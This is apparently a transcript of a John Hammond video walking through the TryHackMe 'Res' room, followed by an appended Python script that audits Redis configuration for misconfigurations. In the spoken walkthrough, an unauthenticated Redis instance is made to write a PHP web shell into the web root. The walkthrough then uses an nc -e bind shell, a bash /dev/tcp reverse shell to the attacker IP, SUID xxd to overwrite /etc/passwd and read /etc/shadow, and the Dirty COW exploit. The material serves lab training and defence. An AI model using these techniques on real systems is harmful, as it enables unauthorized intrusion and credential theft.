Exploiting Unauthenticated Redis - TryHackMe!

Captions
Hello everyone, my name is John Hammond. Welcome back to another YouTube video, and in this video I want to be showcasing the Res room from TryHackMe. It's all about "Redus", or Redis, I don't know how to pronounce that; I don't know how to pronounce anything. It says: hack into a vulnerable database server with an in-memory data structure in this semi-guided challenge. This is rated an easy room, and I suppose it has some, I guess, I don't know, fundamental stuff to it, especially for the privesc, but I think it is very cool and fun to showcase Redis as something that you could abuse and take advantage of.

So I've deployed the machine already. I have this IP address and I'll copy it. If you haven't already deployed the machine you can hit that green Deploy button here, and then we can start to take a look at the box. So I have already filled out all these questions and answers here; I will showcase how we get into each of those, but let's dive in.

So I've got a terminal open here. I will ping that box so I can confirm that I can reach it, and I can. Let's make a directory, youtube/res, to work in. You could start some notes, you could make a little Sublime Text, I don't know, or whatever text editor of choice you've got to work with, and make a little README for yourself. But I'm going to start with an nmap scan. I'm going to use nmap -sC -sV -oN nmap/initial with this IP address, so safe scripts or default scripts, and then enumerate versions, output to the nmap format in that nmap directory that I just created, and I'll save the file as initial, and I'm copying and pasting that IP address in there. So I could turn on verbose mode, hit the V button; realistically I probably should have included that -v argument so it's already verbose by default, but we'll see how long this takes. And I guess we can start poking around on the box manually while we're waiting, so I will access it on a web browser over here. I'll just see if I can reach it. It looks like there is an HTTP port open, or HTTP listening on port 80. Right, okay, we're rolling through and we found port 80, great, but that has not found anything else; seemingly we've only found that port. So just to be sure, because our default nmap scan will look for only the first common 1000 ports, we should also run a -p-, and that will include all ports. We'll just call that that. We probably don't need to do those other enumeration scripts, but I guess maybe that's good to do. Again, I probably should have included that -v flag, but regardless, looks like we're scanning with nmap just fine.

So we know we have port 80. We could start to, like, do some enumeration on that: we could Nikto it, we could Gobuster, we could DirBuster, we could start to try and look at more that might be on that page. I don't have... oh, nikto, I have a typo there, sorry. Now let's see if that will run, and I should tee that out to log it, so let me tee nikto.log. There we go, just some basic fundamentals, see if that finds anything interesting. And while we're doing that we could run Gobuster as well. I do have Gobuster, good, so gobuster dir, -u for the URL, -w for the word list. Do I actually have a word list in here? I don't think so. What is it in Kali, /usr/share/wordlists? Wordlists, there is one there, okay. And let's get DirBuster's word list; they have a directory-list-2.3-medium, I suppose, so we could fire that up and see if that gets anything.

Still waiting for this nmap scan to return; it'll probably take a little bit. I could be showcasing RustScan, and that would likely find it super duper fast. Admittedly I am working within Kali on WSL right now, so running RustScan using that Docker container with the kind of Windows Docker Desktop thing, pasting in the IP address and using it with RustScan, it tends to just kind of die. I'm not exactly sure why. I'm sure I could be passing in other arguments and maybe that'll kind of work better with it if I increase the batch size, but it just doesn't happen, so I don't know, maybe one of you has a solution better than I do. But it doesn't look like there's anything that Nikto's finding, doesn't look like there's anything that Gobuster is finding, and nmap is taking its sweet time. RustScan just gave up, which is fantastic to see.

All right, we could do some research on Redis while we're waiting, if my internet comes to hang out. Okay, great, read this: Redis is an open source, BSD licensed, in-memory data structure store used as a database, cache and message broker. Okay, so I actually end up using Redis when I'm setting up CTFd instances, when I'm hosting capture the flag events: we create a Redis server and make sure that, okay, all of the user sessions are able to be actually stored and maintained and accessed, so Redis is the server that we end up creating for that. Typically we'll end up having an authorization setup, or we'll create a password for that Redis server to work on, and that might not be the case when we're looking at it in a, I don't know, hacking lab or hacking environment. So if we wanted to go find out the port that it's listening on, it says by default the Redis server is configured to run on the default port of 6379. You can connect to the server locally or remotely using the redis-cli command line tool, and then you'll need to specify a password. Okay, it looks like there are some documentations that showcase that, so we could explore that if we'd like to.

Let me shut down Nikto and DirBuster and then start to kind of tinker. I will try and use that redis-cli command, and I need to supply what I actually want to connect to. If you don't have redis-cli installed you might need to go ahead and actually sudo apt install redis-tools; redis-tools is the package name that includes that, and maybe your shell actually suggested that to you, I'm not exactly positive, but you'll just go ahead and type in your password, install it, and then you are good to go. So let me redis-cli, and then you'll specify -h for the host that you want to connect to, and I'll grab that IP address one more time so I can connect to it. There we go, submit there, and now seemingly we are connected. We are on that host, and I don't know if we actually have needed to authenticate or not. Something that you could do to test is just try and run, like, ping, and if it responds with PONG then okay, you are in fact connected to the server totally just fine.

And we could look up some Redis enumeration techniques, or like "hacking Redis" or "exploiting Redis", and see what we've got here. HackTricks puts out a great resource on this sort of thing, so let me zoom in on that so you can see it. Basic information: we've got the exact same kind of blurb that we saw online when we were simply Googling, and we've got that default port. We could do automatic enumeration with some nmap scripts, so that would probably be good to do, especially since we can confirm, and now that we know, that we actually have a Redis server here. Our own nmap scan is probably taking a serious amount of time because it's doing all ports. You could use a banner grab, so you could simply netcat to it to try and get any actual information, or we could just connect as we've done with redis-cli, and the installation is just as I discussed. First command you could try to use is info; it may return output with information of the Redis instance, or something like the following is returned. So if you see this NOAUTH Authentication required, that means that you will need credentials to be able to access the Redis server. In the instance here let's try and just go ahead and run that info command and see what we get, and we certainly do not have the whine and complain that we need authorization or authentication. So there's some valuable and juicy info: we have the Redis server version 6.0.7, so we could copy and paste that, and that I know is one of the answers that we need here.

Scan the machine, how many ports are open? We saw 80 and we also know that Redis is open on 6379, so 2 is the proper answer there. Redis is the database management system that's installed, as we have discovered. What port is the database management system running on? 6379, again as we've discovered. What's the version of the management system installed on the server? 6.0.7, and that is what we just determined running that info command. So that's all that we really needed to run there to track down that information, and then we need to just compromise the machine.

Okay, so let's kind of keep exploring and reading through this pentesting Redis documentation. There are notes here, or at least these HackTricks, right, not particularly documentation. By default Redis can be accessed without credentials; however, it can be configured to support only a password, or username and password. We could specify this in redis.conf, the configuration file, and maybe at some point we could kind of configure and tinker with that, play with it, but in this case we don't have to; we will not need to auth or authenticate. If you have valid credentials you'll get this positive OK response after you've logged in, or once you have access you could do more enumeration and just kind of look for stuff. You can start enumerating the service with the following commands: info, which we've already run; client list, which we could explore; Redis responds with connected clients. So let's do client list, and looks like that's my IP address locally and that's the only thing that's currently connected to it. And we could get everything out of the configuration database, or config, so let's do config get, literally everything, and now there's a lot of stuff. So this returns and outputs in kind of an interesting and peculiar way where there will be a variable name on one line and then the value following it, so rdbchecksum is set to yes, daemonize is set to no, etc. It's not going to give you, like, a variable equals value syntax, or like a colon to denote it really readably; you'll just have to kind of take that information with one line following to get the actual value. A lot of information here, maybe something that could be particularly interesting for us, especially some stuff that we will get into next, we can discuss. But this article again explains more Redis commands that we could work with, and we also discuss dumping the database. Inside Redis the databases are numbers, excuse me, are numbers starting from zero; you can find if anyone is using the output of the command info inside the keyspace chunk. Okay, that's particularly interesting, but I'm more concerned with getting remote code execution to compromise the machine.

Okay, looks like we could potentially get a web shell, but you have to know the path of the website folder. Well, we do have this Apache Ubuntu default page, and I wonder if that will tell us: by default Ubuntu does not allow access through the web browser to any file apart from those located in /var/www, public_html directories... Okay, the default Ubuntu document root is /var/www/html, and that's kind of common; that's pretty much what we would expect, but we could see that typically with this Ubuntu default page, so that's pretty handy. So what we could do is we could connect to our victim Redis server, we could set the directory by modifying config, and then set a file name for it to be stored as. If we give it a PHP extension then we could just, okay, just set a value seemingly, and then go ahead and save, and it might dump that file. So we could try that. Let's go ahead and do some config set dir /var/www/html. Right, okay, so that responded positively, and then we could config set dbfilename, um, test.php maybe, right? And now let's just set a variable name, so test, and it doesn't matter, because it'll be included in this dump when we save everything; it's kind of in Redis's memory, right. We could set this to... I don't know why my voice went weird there. Let's check out phpinfo and see if we can actually get PHP code execution for one thing. Now we've set that variable and we can save it. Good, so let's hop back over to the web page here and try and access test.php. Ooh, okay, now we have phpinfo and we have proof that we can execute PHP, which means that we have server-side code execution.

So let's make this a little bit more fun. Let's set our database file name to something like shell.php, and let's set test to something like a system with a variable that we could pass in, like a $_GET['c'] or something. $_GET will let us specify an HTTP variable that we've supplied, and c will just be the variable name that we want to use. So now when I run this and I save that, we should be able to have shell.php run anything that we'd like if we pass it in. Okay, so right now I haven't supplied any command, I haven't supplied a c value, but if I do, with a little question mark and c=id, ooh, we have www-data and a uid and gid output, so it looks like we are running commands, right. We could run like whoami and dir and list, or ls, and other things. So we have code execution; now we just kind of want to get a reverse shell back to us.

So what could we do here? We could use a typical, like, pentestmonkey reverse shell cheat sheet and use like a netcat connection to get back to us. Something that we also could do is actually open up a bind shell depending on what version of netcat we have. And actually, let's verify we actually have netcat with a which nc. Okay, we do have /bin/nc seemingly, so could I try and run like nc -v for the version, is that a thing? --version? No, seemingly. Okay, let's try to see if it has that old -e argument, or that -e flag and parameter where we could specify a command to run as you connect back to it, so -e /bin/bash, and then let's listen, so -lnvp: l for listen, n for don't resolve domain names, DNS stuff, v for verbose, and p for a port. Let's put it on like quad 8 or whatever. Now because I see the URL on the web page still spinning, I kind of have the thought that it's actively running that, so I could go ahead and connect to it, or at least try to, right. So let me move out of this terminal and let's netcat to that IP address; that's 10.10.31.148 I think, and it's quad eight, right? So I'm seemingly connected and I have command execution, right, so I can run things and navigate around the file system. Awesome, okay, good, win, good, we got it.

That's one way of doing it, or you could of course do a simple bash shell. Interesting thing, let me have that reverse shell, the bash reverse shell. I'll set up a listener on my attacker machine on quad 9 and let me try to use that bash reverse shell. So I finally remembered this, I finally memorized it, and I want you to try and remember it too: bash -i for interactive, redirected to an ampersand, right, and then /dev/tcp/ your IP address, so I'm 10.2.2.132, and then slash and the port, so quad 9 is what I'm listening on, and then we go start from zero, right, and you redirect it to ampersand one, 0>&1. That's kind of how I've started to remember it, so now you don't have to look up "hey, what's that bash syntax for a reverse shell" all the time. When you run this you may or may not actually get a shell back; the gimmick here is that if it's running in sh, or just that regular default flat shell, it's not going to work, it's going to get some bad file descriptor, so that doesn't execute. What you could do is you could pass it to another bash command, so if in this URL I included a bash -c and then included like some quotes to denote this here, now I've got bash running. And that might not have run for me; let me use single quotes here, see if that will behave, or I might just have my syntax wrong. Maybe I lied the entire time. Let's get the HighOn.Coffee reverse shell cheat sheet and verify; I could very well be wrong while I'm trying to tell you "oh, this is how you remember this thing" and I just misremember myself. bash -i redirected to an ampersand, /dev/tcp/ attacking IP address, zero redirected to and one, so that's totally right. Maybe we need /bin/bash or I need a space following these for some reason; I know bash can be super duper finicky. Let me verify that my IP address is what I think it is, so I will ip a s eth0, and I am 10.2.2.132, listening on quad 9. Let's see if that works. Still nothing. Maybe it's my WSL thing being annoying. I shouldn't waste my time troubleshooting this when we already have given ourselves code execution previously; it doesn't need to be an issue. Maybe, if anything, you memorize the fact that, okay, /bin/bash -i with that is the way you get that. What am I missing here? This is blowing my mind, that's the right syntax, 10.2.2.132, quad 9, nothing, nothing. Okay, whatever, we'll edit that part out, we'll get it in post. We'll do that netcat -e methodology for /bin/bash, and then let's listen on quad 8, and now that that is running we know we could connect back to it and get code execution.

Fun thing here is that we could very well connect with pwncat, so let me start that one more time, and I'm going to hop on over to a different shell and move into pwncat, and I will git pull to get the current release, because Caleb's doing some crazy work on this right now and we could showcase some of that. Let's invoke our virtual environment and then run pwncat and connect to that 10.10.13.148, is that right? 31. I was so close. There we go, on quad 8. So now we should be connecting to it. Great, not in the database, so it'll go ahead and connect to it, and that works just fine for us. So pwncat will be able to kind of showcase a lot of our enumeration stuff in a very quick and easy way. It might take some time, so we might fire up another session while we're working here, but I'm going to switch to my local prompt. I'm going to use the new syntax to try and run enumerate, and if I tab complete on enumerate you could enumerate.gather and just start to look for stuff. So pwncat will do its thing; he's essentially running his own version of LinPEAS. But let's go open another terminal and try and connect back to it. I should have started like a reverse shell while I was doing that, but let's listen on quad 9 and then just do a regular connection here. There we go. Or I could very well just do that with another pwncat instance and see if he survives, so we can clear those old terminals that we don't need anymore. What's up, pwncat, do his thing. He might take a little bit because TryHackMe seems to be slow; when I use this on a Hack The Box machine it's much, much faster. TryHackMe I think is a little bit, I don't know. Interesting thing though, because I'm comparing and discussing Hack The Box in relation to TryHackMe right now: you might have seen this gimmick with a Redis technique here on the Postman machine, and you could use it to, okay, clobber one of the user's private keys, like their SSH private key, so you could SSH into the box, and that would give you initial access, and that was great. And I thought like, oh, Res is going to be just like that, I could clobber an SSH key, but we don't have SSH open on this machine, so that kind of gets in the way. Whatever, interesting. We've got now this web shell, kind of a cool new different technique we could use.

So let's do some manual enumeration. We know we are currently running as www-data, so let's go ahead and cat out /etc/passwd. Oh, but pwncat has finished, so let's see what he's got for me. Blah blah blah, scrolling through, looks like we have results here, so we have a mount point, we have some network information, we are running Ubuntu 16.04, ASLR is enabled, potentially found some passwords, although these are just dollar sign twos so that doesn't make a whole lot of sense, processes that are running, a kernel version, and setuid binaries. Ooh, xxd is owned by root; that's peculiar. xxd is like a blaring and blatant GTFOBin. Oh, is it also vulnerable to Dirty COW? That'd be fun; we should try and use Dirty COW, maybe a little fun extracurricular at the end of this video. Let's try to showcase that GTFOBins gimmick. So GTFOBins, if you're searching for these, xxd is a quick and easy win. In this case, because it's owned by root, we could probably just get that, you know, let's search for xxd, and we can file write and file read, so we could just clobber /etc/passwd and get another user. So pwncat knows how to do this actually; if you try and run escalate auto it'll just tell you what it could potentially do, because it knows, hey, we could read and write with xxd as root. We could just go ahead and execute that and then it will try to clobber /etc/passwd. We've been finagling this, because I brought it up, and it seems to think that it failed when it actually succeeded, and let me see if it shows you here. I'm kind of hoping we could... I didn't mean to zoom in on that while it was going, but it'll give me like "hey, error, module failed, no escalation path found", but if I check out /etc/passwd, which we've clobbered, let's get to our remote prompt, we have successfully added a pwncat user with a backdoor password that has user ID 0 and can just be root. So I will su to pwncat and just use the pwncat password at the backdoor, and now we're root. That's it, okay, done. For some reason pwncat doesn't think that it succeeded and we're still kind of troubleshooting that, but literally running it again, it'll be like "oh, I found your persistence because I already created it" and then it'll just give you root, so that's neat.

Moving into root, which you can do, then you cat the flag, root.txt, and you win. Okay, that's all you needed to do. If you had not done that, if you had been able to go into the other user here, which I think was vianka, yeah, vianka actually has permissions to just run sudo everything. So let me su into vianka, because I can, and let's try and sudo -l. You could... don't need her password, do you need your password? Regardless, let me not care about that, because we've just jumped over user and got into root. We could get into her home directory and then cat that flag, cat user.txt, yep, and you would submit that just fine. We could answer those last questions. Oh, what is the local user account? I follow, yeah, I'm sorry: because you had xxd as your privesc you could use xxd to read /etc/shadow, and then you could grab vianka's hash and then crack it. That's kind of nice and easy, but we could do that, right. Let's try and use some of those GTFOBins manually just so you see actually what's happening: file read with xxd. If I were just www-data again, we could xxd /etc/shadow and just simply read it out, and then we have vianka's password, so we could crack that with John the Ripper. So let's move over to our same directory where we were; we were in youtube/res. Let's subl shadow.txt or something and just slap it in there, and then we should be able to run john, yep, I think, on that, and then the wordlist. Where is... do we even need to specify a wordlist? Well, John just figured out... while John is cranking let's try to see, oh yeah, he just grabs his own user, sir John. Is there one for rockyou? Oh yeah, it just rips it out. I'm not used to being on Kali, I'll admit, man. /usr/share, rockyou, yeah okay, it's there. So then you could su into vianka, beautiful, one, and then you could sudo -l, did you spell that right? One, I think I still spelt it wrong, nope, okay. She can just literally run everything. He or she, vianka, male or female, I don't know. You can sudo everything, so there's root immediately.

Gimmicks and fun things here though, before we start to dive into Dirty COW, because you guys like when I move into stuff that I haven't seen before: there's an interesting gimmick with this file write in xxd. Let's say you are trying to write into "anything", how about that, that'll be the name of the file that we want to write to, and xxd writes from only the beginning, and that's it. So let me show you this. Let me paste this in, and it's going to ruin this prompt, so let me sync and reset. Cool. If I paste this it still ruins that prompt, whatever, how about that, nope. Let's get a regular... let's do this from home, who cares. Let's set LFILE to anything, and then let's try and write echo, like nine nines, one two three four five one two three, into LFILE. So now I have this anything file, but if I were to echo five fives, one two three four five, cat anything, I've added five fives, and then there's my newline, and then there's those remaining nines. This would probably be a better example with -n so we don't have the newline. You'll notice that it's not clobbering the original data; that's just how it's going to end up doing it. Let me rm anything so we can clear it out and get a better visual. Add in fours, and now let's add in just twos, and it just starts at the beginning and writes everything that you specify. That's good to note: if you don't fill up the whole rest of that file buffer it'll still linger in there, especially when you use xxd, at least with that GTFOBins technique, so good to know.

All right, we've got root, we've showcased some xxd stuff, and do we have gcc? We do. All right, let's try a Dirty COW. Let's try it: dirtycow.c, here's one, and that is the one that's, I think, just tampering a file. I want the FireFart Dirty COW; FireFart, I think it's the, yeah, it's dirty.c, this one here. It'll add a whole user for us and it explains how you can compile it nice and easily. Let's see if we can write this here. Let's just go ahead and, where am I currently? In pwncat, oh, I'm in pwncat, that's annoying, so let's move into there, get pwncat, and let's just subl a dirty.c, slap all that in, and now let's go ahead and upload that. So let's upload dirty.c, there we go, and now in my /tmp directory I have dirty.c. If I cat that out on the victim we have our Dirty COW source code, so let's gcc, and the syntax they use here is -pthread and -lcrypt are the libraries we're also going to include, so slap that in, see if it will compile. It should output to dirty. That's completed; now I have dirty, which is a file and binary I could run, so let's make sure that's executable, I think the compiler will already do that. Let's try it and see if we don't break this box. Let's set our password. Successfully backed up to /tmp/passwd.bak. Enter the new password: I'll type in "anything", and let's give it a little bit of time to see if it actually does complete the Dirty COW exploit. I know this is a little bit dangerous, it might shake the box up, but I want to showcase, I want to tinker with it, I want to see if it'll be anything fun. I guess I'll pause the recording now and just let this do its thing, but I hope you guys have learned some other good nuggets while we've been rolling through it. Thanks, I'll see you soon.

Okay, I stepped out for a quick little bio break, but it looked like it finished: done, check /etc/passwd to see if the new user was created. You could log in with the username firefart and the password "anything", which is the one that I typed in there. I did not mean to copy that and try to type it, okay. Is firefart in itself a password? Seemingly no. su firefart, does he exist? No, that's not in /etc/shadow, is it? shadow, shadow, no. Oh, I need to be root. Well, yeah, okay, fine. I'm pretty sure Dirty COW is probably not even applicable to 16.04. Let's check dirtycow.ninja; you can check out that page and see what he's got here. Oh no, I don't want these proof of concepts, I want to see the "check if your system is vulnerable". You could see the patched kernel versions, yeah, 16.04 LTS, and that is the kernel version that we saw, 4.4.0, right? Let's do a uname -a. Yeah, okay, maybe 4.4.0 and then 189, so I'm thinking that's past. But that was fun, that was a good little exercise. You guys were probably screaming at me like "stop, don't bother John, it's not even vulnerable", but hey, you got to see the compile process and maybe that was a good little exercise.

Okay, that's enough of me talking; this has been a long video, but hey, thank you guys so much for watching. I hope you enjoyed, I hope you're able to follow along and see all of the little gimmicks and techniques and tricks there, but that's how I got those flags here and completed the Res room. So thanks for hanging out everybody, I hope you enjoyed and I'll see you in the next video.
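The video points out that `config get *` prints each setting's name on one line and its value on the next, and then shows that an unauthenticated instance lets `config set dir` / `config set dbfilename` / `save` drop a file into the web root. As an added example (mine, not from the video, the room, or the Redis project), here is a small Python audit script that parses that alternating output exactly as redis-cli prints it and flags the settings that make that possible: an empty `requirepass`, a `dir` under a web root, a `dbfilename` with a script extension, `protected-mode` off and a `bind` on all interfaces. The sample output and the hardened baseline are constructed; the web-root list and the suffix list are my assumptions.

```python
import re

# Constructed sample of what redis-cli prints for `CONFIG GET *`: the setting
# name on one line and its value on the next, no "name=value" syntax. The values
# mirror the misconfigured state the walkthrough ends up in.
SAMPLE_OUTPUT = """\
 1) "rdbchecksum"
 2) "yes"
 3) "daemonize"
 4) "no"
 5) "requirepass"
 6) ""
 7) "dir"
 8) "/var/www/html"
 9) "dbfilename"
10) "shell.php"
11) "protected-mode"
12) "no"
13) "bind"
14) ""
"""

# Constructed baseline of what a hardened instance should report.
HARDENED = {
    "requirepass": "example-strong-passphrase",  # placeholder, not a real secret
    "dir": "/var/lib/redis",
    "dbfilename": "dump.rdb",
    "protected-mode": "yes",
    "bind": "127.0.0.1 ::1",
}

# Assumed document roots and script suffixes worth flagging.
WEB_ROOTS = ("/var/www/", "/usr/share/nginx/", "/srv/http/")
SCRIPT_SUFFIXES = (".php", ".phtml", ".jsp", ".aspx")

# One redis-cli array line looks like: `10) "shell.php"`.
LINE_RE = re.compile(r'^\s*\d+\)\s*"(.*)"\s*$')


def parse_config_pairs(flat):
    """Turn the flat [name, value, name, value, ...] list into a dict."""
    if len(flat) % 2:
        raise ValueError("odd number of items: a setting name without a value")
    return {flat[i]: flat[i + 1] for i in range(0, len(flat), 2)}


def parse_redis_cli_config(text):
    """Parse the pretty-printed redis-cli output of CONFIG GET *."""
    items = [m.group(1) for m in map(LINE_RE.match, text.splitlines()) if m]
    return parse_config_pairs(items)


def audit_config(cfg):
    """Return (setting, reason) pairs for settings that enable the dump-to-webroot trick."""
    findings = []
    if not cfg.get("requirepass"):
        findings.append(("requirepass", "empty: no authentication before CONFIG SET or SAVE"))
    directory = cfg.get("dir", "")
    if (directory.rstrip("/") + "/").startswith(WEB_ROOTS):
        findings.append(("dir", f"{directory} is under a web root; SAVE writes where the web server serves files"))
    filename = cfg.get("dbfilename", "")
    if filename.lower().endswith(SCRIPT_SUFFIXES):
        findings.append(("dbfilename", f"{filename} has a server-side script extension instead of .rdb"))
    if cfg.get("protected-mode", "").lower() == "no":
        findings.append(("protected-mode", "disabled"))
    bind = cfg.get("bind", "").split()
    if not bind or any(addr in ("*", "0.0.0.0", "::") for addr in bind):
        findings.append(("bind", "listening on all interfaces"))
    return findings


if __name__ == "__main__":
    parsed = parse_redis_cli_config(SAMPLE_OUTPUT)
    for setting, reason in audit_config(parsed):
        print(f"{setting}: {reason}")
    print("hardened baseline findings:", audit_config(HARDENED))
```

Against a live instance you would feed it the output of `redis-cli -h <host> config get '*'` instead of the constructed sample; the remediation each finding points at is the matching line in redis.conf (set `requirepass`, keep `dir` outside any document root, leave `protected-mode yes` and bind to loopback or an internal address).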
Info
Channel: John Hammond
Views: 19,075
Rating: 4.9521675 out of 5
Id: LVlQmRM6DZ0
Length: 35min 8sec (2108 seconds)
Published: Tue Oct 20 2020